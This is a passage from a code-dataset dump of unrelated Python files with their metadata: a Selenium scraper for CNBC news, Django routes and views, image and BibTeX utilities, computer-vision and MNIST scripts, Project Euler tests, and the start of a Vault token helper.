re\r\nimport csv\r\nimport time\r\nfrom datetime import datetime, timedelta,date\r\nfrom pytz import timezone\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom dateutil.parser import parse\r\nimport time\r\n\r\n\r\nclass NewspaperScraper:\r\n def __init__ (self, dateStart, dateEnd):\r\n self.searchTerm1 = 'bank'\r\n self.searchTerm2='coronavirus'\r\n self.dateStart = parse(dateStart)\r\n self.dateEnd = parse(dateEnd)\r\n self.links = []\r\n\r\n\r\n def check_dates (self, date):\r\n page_date = parse(date)\r\n if page_date >= self.dateStart and page_date <= self.dateEnd:\r\n return True\r\n return False\r\n\r\n\r\n def write_to_csv (self, data, file_name):\r\n print ('writing to CSV...')\r\n\r\n keys = data[0].keys()\r\n with open(file_name, 'a+',encoding='utf-8',newline='') as output_file:\r\n dict_writer = csv.DictWriter(output_file, keys)\r\n dict_writer.writeheader()\r\n dict_writer.writerows(data)\r\n print('written to file')\r\n\r\n \r\n def check_keywords(self,s):\r\n if re.search('coronavirus',s.lower()) is not None or re.search('covid',s.lower()) is not None:\r\n if re.search('bank',s.lower()) is not None :\r\n return True\r\n return False\r\n\r\n \r\n\r\n\r\n\r\n\r\nclass CNBCScraper(NewspaperScraper):\r\n\r\n def get_pages 
(self, sleep_time=3):\r\n print ('running get_pages()...')\r\n\r\n links = {}\r\n stop = False\r\n index = 1\r\n days = (self.dateEnd.date() - self.dateStart.date()).days + 1\r\n\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n\r\n \r\n driver = webdriver.Chrome(options=chrome_options,executable_path=r\"C:\\Users\\suryansh\\Downloads\\chromedriver_win32 (2)\\chromedriver.exe\")\r\n driver.get('http://search.cnbc.com/rs/search/view.html?partnerId=2000'\r\n + '&keywords=' + self.searchTerm1\r\n + '%2C'\r\n + self.searchTerm2\r\n + '&sort=date&type=news&source=CNBC.com'\r\n + '&pubtime=' + str(days) + '&pubfreq=d'\r\n )\r\n time.sleep(15)\r\n\r\n\r\n ele=driver.find_element_by_xpath('//select[@class=\"minimal SearchResults-searchResultsSelect\"]')\r\n ele.find_element_by_xpath(\".//option[contains(text(), 'Articles')]\").click()\r\n time.sleep(sleep_time)\r\n \r\n for i in range(50):\r\n\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\r\n time.sleep(2)\r\n\r\n results=driver.find_elements_by_xpath('//div[@class=\"SearchResult-searchResult SearchResult-standardVariant\"]')\r\n\r\n main_data=[]\r\n\r\n for result in results:\r\n try:\r\n pub_date = result.find_element_by_xpath(\".//span[@class='SearchResult-publishedDate']\").text\r\n\r\n ltext = result.find_element_by_xpath('.//span[@class=\"Card-title\"]').text\r\n link = result.find_element_by_xpath('.//a[@class=\"resultlink\"]').get_attribute('href')\r\n print(link)\r\n if self.check_keywords(ltext) and not links.get(link,False) and self.check_dates(pub_date):\r\n links[link]=True\r\n driver.execute_script(\"window.open('');\")\r\n driver.switch_to.window(driver.window_handles[1])\r\n driver.get(link)\r\n time.sleep(10)\r\n p=''\r\n for para in driver.find_elements_by_xpath('//div[@class=\"group\"]'):\r\n for e in para.find_elements_by_xpath('.//p'):\r\n p+=e.text\r\n \r\n data = {\r\n 'title': ltext,\r\n 'date_published': pub_date,\r\n 'article_link': link,\r\n 'text': p\r\n }\r\n print(data['title'])\r\n main_data.append(data)\r\n time.sleep(sleep_time)\r\n driver.close()\r\n driver.switch_to.window(driver.window_handles[0])\r\n except Exception as e:\r\n print(e)\r\n\r\n self.links = links\r\n return main_data\r\n \r\nstart=input('From date in format yyyy-mm-dd :- ')\r\nend=input('To date in format yyyy-mm-dd :- ')\r\ndef run_scraper (start,end):\r\n scraper=CNBCScraper(start,end)\r\n data=scraper.get_pages()\r\n if len(data)==0:\r\n print('NO news related to current keywords in specified range')\r\n else:\r\n scraper.write_to_csv(data,'CNBCScraper.csv')\r\n \r\n \r\nrun_scraper(start,end)\r\n\r\n \r\n ", "sub_path": "CNBC_ARTICLE_SCRAPER.py", "file_name": "CNBC_ARTICLE_SCRAPER.py", "file_ext": "py", "file_size_in_byte": 5058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dateutil.parser.parse", "line_number": 20, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 21, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 26, "usage_type": "argument"}, {"api_name": "csv.DictWriter", "line_number": 37, "usage_type": "call"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "re.search", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", 
"line_number": 64, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "651632408", "text": "from PIL import Image\nimport os\nimport math\n\nimages_path = ('PATH')\nsize = 300*300\ndestination_path = (images_path + '\\\\modified_images') # The destination where the modified files will be saved.\n\ntry:\n os.mkdir(destination_path)\nexcept FileExistsError:\n pass\n\n# This for loop takes a directory with images, rotates them to be all vertical and resizes according to desired size\n# while maintaining the same width/height ratio\nimage_count = 1\nfor file in os.listdir(images_path):\n if os.path.isdir(images_path + '\\\\' + file):\n continue\n else:\n image = Image.open(images_path + '\\\\' + file)\n width, height = image.size\n area = width * height\n ratio = math.sqrt(size/area)\n new_width = int(round(width * ratio))\n new_height = int(round(height * ratio))\n image = image.resize((new_width, new_height))\n if width > height:\n image = image.rotate(90)\n image.save('{}/image{}.jpg'.format(destination_path, str(image_count)))\n image_count += 1\n", "sub_path": "Photo_manipulation.py", "file_name": "Photo_manipulation.py", "file_ext": "py", "file_size_in_byte": 1035, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.mkdir", "line_number": 10, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "311456137", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\n\n#from welcome.views import index, health\nfrom welcome import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^health$', views.home, name = 'home'),\n\n url(r'^$', views.home, name = 'home'),\n url(r'^chapters$', views.chapters, name = 'chapters'),\n url(r'^login', views.login, name = 'login'),\n url(r'^logout', views.logout, name = 'logout'),\n url(r'^register', views.register, name = 'register'),\n url(r'^uniqueChapters', views.uniqueChapters, name = 'uniqueChapters'),\n url(r'^uniqueBook', views.uniqueBook, name = 'uniqueBook'),\n\n url(r'^book/(?P[a-zA-Z0-9]+)', views.book, name = 'book'),\n url(r'^cover', views.cover, name = 'cover'),\n\n\n url(r'^admin/', admin.site.urls),\n\n url(r'^chapterslist/$', views.upload_chapter, name = 'chapter_list'),\n\n url(r'^uploadchapter', views.upload_chapter, name = 'upload_chapter'),\n\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "sub_path": "project/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1061, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", 
"pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "welcome.views.home", "line_number": 10, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "welcome.views.home", "line_number": 12, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "welcome.views.chapters", "line_number": 13, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "welcome.views.login", "line_number": 14, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "welcome.views.logout", "line_number": 15, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "welcome.views.register", "line_number": 16, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "welcome.views.uniqueChapters", "line_number": 17, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "welcome.views.uniqueBook", "line_number": 18, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "welcome.views.book", "line_number": 20, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "welcome.views.cover", "line_number": 21, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "welcome.views.upload_chapter", "line_number": 26, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 26, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "welcome.views.upload_chapter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "welcome.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "198186372", "text": "from django.shortcuts import render\nfrom 
django.http import HttpResponse, JsonResponse\nfrom lab4.models import *\nimport json\n# Create your views here.\n\ndef getUsersList(request):\n results = {}\n data = []\n for user in Users.objects.all():\n tmp = {}\n tmp['id'] = user.id\n tmp['name'] = user.name\n tmp['surname'] = user.surname\n data.append(tmp)\n results['Users'] = data\n return JsonResponse(data=results)\n\ndef setUser(request):\n name = request.GET['name']\n surname = request.GET['surname']\n student = Users(name=name, surname=surname)\n student.save()\n json_data = {\"success\":True}\n return JsonResponse(data=json_data)\n\ndef editUser(request):\n id = request.GET['id']\n newName = request.GET['name']\n newSurname = request.GET['surname']\n student = Users.objects.get(id=id)\n student.name = newName\n student.surname = newSurname\n student.save()\n json_data = {\"success\":True}\n return JsonResponse(data=json_data)\n\ndef getUser(request):\n id = request.GET['id']\n student = Users.objects.get(id=id)\n name = student.name\n surname = student.surname\n json_data = {\"name\":name, \"surname\":surname }\n return JsonResponse(data=json_data)\n\ndef deleteUser(request):\n id = request.GET['id']\n student = Users.objects.get(id=id)\n student.delete()\n name = student.name\n surname = student.surname\n json_data = {\"success\":True }\n return JsonResponse(data=json_data)", "sub_path": "11BD02042/lab4MCserver/lab4/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1473, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.http.JsonResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "620034590", "text": "import itertools\nimport bibtexparser\nfrom bidict import inverted\n\nwith open('bibtex/data/uist-2021.bib') as bibtex_file:\n bib_database = bibtexparser.load(bibtex_file)\n\n# print(bib_database.entries)\n\nunique_keywords = []\ncombination_list = []\n\nfor entry in bib_database.entries:\n # print(entry['author'].split(' and '))\n try:\n keyword_list = entry['keywords'].split(',')\n keyword_list = [x.strip().lower().replace('.', '') for x in keyword_list]\n for combination in itertools.combinations(keyword_list, 2):\n tuple = f\"{combination[0]} - {combination[1]}\"\n print(tuple)\n combination_list.append(tuple)\n for keyword in keyword_list:\n # print(keyword.strip().lower())\n unique_keywords.append(keyword.strip().lower())\n except:\n pass\n\n# print(len(unique_keywords))\n# counting = dict()\n# for keyword in unique_keywords:\n# counting[keyword] = counting.get(keyword, 0) + 1\n# for w in sorted(counting, key=counting.get,reverse=True):\n# print(w, counting[w])\n# print(counting)\nunique_keywords = list(dict.fromkeys(unique_keywords))\n# print(len(unique_keywords))\n# print(unique_keywords)\n ", "sub_path": "bibtex/bibtex-reader-bibtexparser.py", "file_name": "bibtex-reader-bibtexparser.py", "file_ext": "py", "file_size_in_byte": 1129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bibtexparser.load", "line_number": 6, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 18, 
"usage_type": "call"}]} +{"seq_id": "523915287", "text": "import cv2\nimport numpy as np\nimport os\nimport sys\nfrom utils import *\nfrom hole_filling import hole_filling, hole_filling2\nfrom task1 import task1\nfrom estimator_adaptative import evaluate\nfrom morphology import Opening\nfrom sklearn import metrics\nfrom estimator_adaptative import week2_masks\nfrom morphology import Dilatation, Closing\n\n\n\n\ndata_path = '../../databases'\nPlotsDirectory = '../plots/Week3/task3/'\n\nif not os.path.exists(PlotsDirectory):\n os.makedirs(PlotsDirectory)\n\nnames = ['highway', 'fall', 'traffic']\nestimation_range = [np.array([1050, 1200]), np.array([1460, 1510]), np.array([950, 1000])]\nprediction_range = [np.array([1201, 1350]), np.array([1511, 1560]), np.array([1001, 1050])]\n\ndef task3(X_est, X_pred, rho, alpha, apply = True):\n\n mask = week2_masks(X_est, X_pred, rho=rho, alpha=alpha)\n\n kernel_closing = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(7, 7))\n kernel_opening = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (4, 4))\n kernel_opening1 = np.ones((2, 2), np.uint8)\n\n if apply:\n mask = Closing(mask, kernel_closing)\n mask = hole_filling2(mask, connectivity=8, visualize=False)\n if apply:\n mask = Opening(mask, kernel_opening)\n else:\n mask = Opening(mask, kernel_opening1)\n\n\n return mask\n\n\ndef compute_AUC(X_est, X_pred, y_pred, alpha_range, rho, pixels):\n Pr = []\n Re = []\n for alpha in alpha_range:\n print(alpha)\n X_res = task2(X_est, X_pred, rho, alpha, pixels)\n Pr.append(evaluate(X_res, y_pred, \"precision\"))\n Re.append(evaluate(X_res, y_pred, \"recall\"))\n\n return metrics.auc(Re, Pr, True)\n\n\n\ndef main():\n data_path = '../../databases'\n PlotsDirectory = '../plots/Week3/task3/'\n\n if not os.path.exists(PlotsDirectory):\n os.makedirs(PlotsDirectory)\n\n names = ['highway', 'fall', 'traffic']\n estimation_range = [np.array([1050, 1200]), np.array([1460, 1510]), np.array([950, 1000])]\n prediction_range = [np.array([1201, 1350]), np.array([1511, 1560]), np.array([1001, 1050])]\n\n a = [{'min': 0, 'max': 40, 'step': 1}, {'min': 0, 'max': 40, 'step': 1}, {'min': 0, 'max': 40, 'step': 1}]\n\n params = { 'highway': {'alpha': 7.25, 'rho': 0.6},\n 'fall': {'alpha': 3.2, 'rho': 0.004},\n 'traffic': {'alpha': 10.67, 'rho': 0}}\n\n n_pixels = 20\n for i in range(len(names)):\n #i = 0\n [X_est, y_est] = load_data(data_path, names[i], estimation_range[i], grayscale=True)\n [X_pred, y_pred] = load_data(data_path, names[i], prediction_range[i], grayscale=True)\n\n mask3 = task3(X_est, X_pred, params[names[i]]['rho'], params[names[i]]['alpha'], True)\n maskno3 = task3(X_est, X_pred, params[names[i]]['rho'], params[names[i]]['alpha'], False)\n print(names[i] + \": F1 score new = \" + str(evaluate(mask3, y_pred, 'f1')))\n print(names[i] + \": F1 score past = \" + str(evaluate(maskno3, y_pred, 'f1')))\n\n pr = evaluate(mask3, y_pred, \"precision\")\n re = evaluate(mask3, y_pred, \"recall\")\n\n pr_no = evaluate(maskno3, y_pred, \"precision\")\n re_no = evaluate(maskno3, y_pred, \"recall\")\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n# ================== TESTING ================\n#im = hole_filling(images=X_pred, visualize=True) # Manual sequence: press \"Enter\" to advance in the sequence\n#hole_filling2(images=X_pred, connectivity=8, visualize=True) # Manual sequence: press \"Enter\" to advance in the sequence\n\n\n", "sub_path": "Week4/backup_week2/task3.py", "file_name": "task3.py", "file_ext": "py", "file_size_in_byte": 3459, "program_lang": "python", "lang": 
"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "estimator_adaptative.week2_masks", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.getStructuringElement", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.MORPH_ELLIPSE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 33, "usage_type": "attribute"}, {"api_name": "morphology.Closing", "line_number": 36, "usage_type": "call"}, {"api_name": "hole_filling.hole_filling2", "line_number": 37, "usage_type": "call"}, {"api_name": "morphology.Opening", "line_number": 39, "usage_type": "call"}, {"api_name": "morphology.Opening", "line_number": 41, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 53, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 85, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 86, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 88, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 89, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 91, "usage_type": "call"}, {"api_name": "estimator_adaptative.evaluate", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "344010241", "text": "import pytest\nfrom sampleproject.www.Project_Euler.problem051_100 import problem060\n\n\ndef test_resolved_problem():\n cls = problem060.problem_060()\n cls.prim_set = [3, 7, 109, 673]\n assert cls.resolved_problem() == 792\n\n\ntest_is_prim_decision_list = [\n (1, False),\n (2, True),\n (3, True),\n (4, False),\n (5, True),\n (6, False),\n (7, True),\n (8, False),\n (9, False),\n (10, False),\n (11, True)\n]\n@pytest.mark.parametrize(\"num, exp\", test_is_prim_decision_list)\ndef test_is_prim_decision(num, exp) -> None:\n cls = problem060.problem_060()\n assert cls.is_prim_decision(num) == exp\n\n\ntest_is_quite_remarkable_prim_number_combination_list = [\n ((3, 7, 109, 673), True),\n ((4, 7, 109, 673), False),\n ((2, 3, 5, 7), False)\n]\n@pytest.mark.parametrize(\"prim_num_list, exp\", test_is_quite_remarkable_prim_number_combination_list)\ndef test_is_quite_remarkable_prim_number_combination(prim_num_list, exp):\n cls = problem060.problem_060()\n assert 
cls.is_quite_remarkable_prim_number_combination(list(prim_num_list)) == exp\n\n", "sub_path": "tests/sampleproject/www/Project_Euler/problem051_100/test_problem060.py", "file_name": "test_problem060.py", "file_ext": "py", "file_size_in_byte": 1071, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060.problem_060", "line_number": 6, "usage_type": "call"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060", "line_number": 6, "usage_type": "name"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060.problem_060", "line_number": 26, "usage_type": "call"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060", "line_number": 26, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060.problem_060", "line_number": 37, "usage_type": "call"}, {"api_name": "sampleproject.www.Project_Euler.problem051_100.problem060", "line_number": 37, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "591072086", "text": "from torch.utils.data import Dataset, DataLoader\nimport torchvision\nfrom skimage import io\nimport torch\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nfrom torchvision import transforms, utils\n\n\"\"\"\nTest reading MNIST for training with hand-written code instead of the ready-made interface\n1. Unpack the MNIST files into image files\n2. Write a custom Dataset, overriding the three methods __init__, __getitem__ and __len__\n\nDependencies:\npip install --user scikit-image\npip install --user scipy\n\"\"\"\n\ndef unzip_mnist():\n    \"\"\"\n    Unpack the MNIST files into images\n    :return:\n    \"\"\"\n    mnist_data_test = torchvision.datasets.MNIST(root=r'D:\\work\\data', train=False, download=True)\n    print('test set:', len(mnist_data_test))\n\n    f = open(r'D:\\work\\data\\MNIST\\image\\mnist_test.txt', 'w')\n    for i, (img, label) in enumerate(mnist_data_test):\n        img_path = \"D:/work/data/MNIST/image/test/\" + str(i) + \".jpg\"\n        io.imsave(img_path, np.array(img)) # note: passing img directly fails with 'Image' object has no attribute 'dtype'; it must be wrapped with np.array(img)\n        f.write(img_path+' '+str(label)+'\\n')\n    f.close()\n\n\ndef default_loader(path):\n    return Image.open(path).convert('RGB')\n\n\nclass MnistDataset(Dataset):\n    \"\"\"\n    Custom dataset; the three methods __init__, __getitem__ and __len__ must be implemented\n    \"\"\"\n    def __init__(self, txt, transform=None, target_transform=None, loader=default_loader):\n        fh = open(txt, 'r')\n        imgs = []\n        for line in fh:\n            line = line.strip('\\n')\n            line = line.rstrip()\n            words = line.split()\n            imgs.append((words[0], int(words[1])))\n        self.imgs = imgs\n        self.transform = transform\n        self.target_transform = target_transform\n        self.loader = loader\n\n    def __getitem__(self, item):\n        fn, label = self.imgs[item]\n        img = self.loader(fn)\n        if self.transform is not None:\n            img = self.transform(img)\n        return img, label\n\n    def __len__(self):\n        return len(self.imgs)\n\n\ndef show_batch(imgs):\n    grid = utils.make_grid(imgs)\n    plt.imshow(grid.numpy().transpose((1, 2, 0)))\n    plt.title('Batch from dataloader')\n\n\ndef use_custom_mnistdataset_test():\n    train_data = MnistDataset(txt=r'D:\\work\\data\\MNIST\\image\\mnist_test.txt', transform=transforms.ToTensor())\n    data_loader = DataLoader(train_data, batch_size=100, shuffle=True)\n    
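# With batch_size=100, each iteration of data_loader yields one batch of (image, label) tensors.\n    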
print(len(data_loader))\n\n for i, (batch_x, batch_y) in enumerate(data_loader):\n if (i < 4):\n print(i, batch_x.size(), batch_y.size())\n show_batch(batch_x)\n plt.axis('off')\n plt.show()\n\n\nif __name__ == '__main__':\n # unzip_mnist()\n use_custom_mnistdataset_test()\n\n\n", "sub_path": "Pytorch/mnist/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 2753, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torchvision.datasets.MNIST", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 25, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 31, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 40, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "585698259", "text": "\"\"\" Vault interactions \"\"\"\nfrom __future__ import print_function\nimport os\nimport socket\nimport hvac\nimport yaml\n# need to override those SSL warnings\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nfrom aomi.helpers import log, cli_hash, merge_dicts, abspath\nfrom aomi.template import render, load_var_files\nfrom aomi.error import output as error_output\nfrom aomi.util import token_file, appid_file\nimport aomi.error\nimport aomi.exceptions\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\ndef approle_token(vault_client, role_id, secret_id):\n \"\"\"Returns a vault token based on the role and seret id\"\"\"\n resp = vault_client.auth_approle(role_id, secret_id)\n if 'auth' in resp and 'client_token' in resp['auth']:\n return resp['auth']['client_token']\n else:\n raise aomi.exceptions.AomiCredentials('invalid approle')\n\n\ndef app_token(vault_client, app_id, user_id):\n \"\"\"Returns a vault token based on the app and user id.\"\"\"\n resp = vault_client.auth_app_id(app_id, user_id)\n if 'auth' in resp and 'client_token' in resp['auth']:\n return resp['auth']['client_token']\n else:\n raise aomi.exceptions.AomiCredentials('invalid apptoken')\n\n\ndef initial_token(vault_client, opt):\n \"\"\"Generate our first token based on workstation configuration\"\"\"\n\n 
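# The branches below try credential sources in order: VAULT_TOKEN, the VAULT_APP_ID/VAULT_USER_ID pair, the VAULT_ROLE_ID/VAULT_SECRET_ID pair, then the on-disk appid and token files.\n    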
app_filename = appid_file()\n token_filename = token_file()\n if 'VAULT_TOKEN' in os.environ and os.environ['VAULT_TOKEN']:\n log('Token derived from VAULT_TOKEN environment variable', opt)\n return os.environ['VAULT_TOKEN'].strip()\n elif 'VAULT_USER_ID' in os.environ and \\\n 'VAULT_APP_ID' in os.environ and \\\n os.environ['VAULT_USER_ID'] and os.environ['VAULT_APP_ID']:\n token = app_token(vault_client,\n os.environ['VAULT_APP_ID'].strip(),\n os.environ['VAULT_USER_ID'].strip())\n log(\"Token derived from VAULT_APP_ID and VAULT_USER_ID\", opt)\n return token\n elif 'VAULT_ROLE_ID' in os.environ and \\\n 'VAULT_SECRET_ID' in os.environ and \\\n os.environ['VAULT_ROLE_ID'] and os.environ['VAULT_SECRET_ID']:\n token = approle_token(vault_client,\n os.environ['VAULT_ROLE_ID'],\n os.environ['VAULT_SECRET_ID'])\n log(\"Token derived from VAULT_ROLE_ID and VAULT_SECRET_ID\", opt)\n return token\n elif app_filename:\n token = yaml.safe_load(open(app_filename).read().strip())\n if 'app_id' in token and 'user_id' in token:\n token = app_token(vault_client,\n token['app_id'],\n token['user_id'])\n log(\"Token derived from %s\" % app_filename, opt)\n return token\n elif token_filename:\n log(\"Token derived from %s\" % token_filename, opt)\n return open(token_filename, 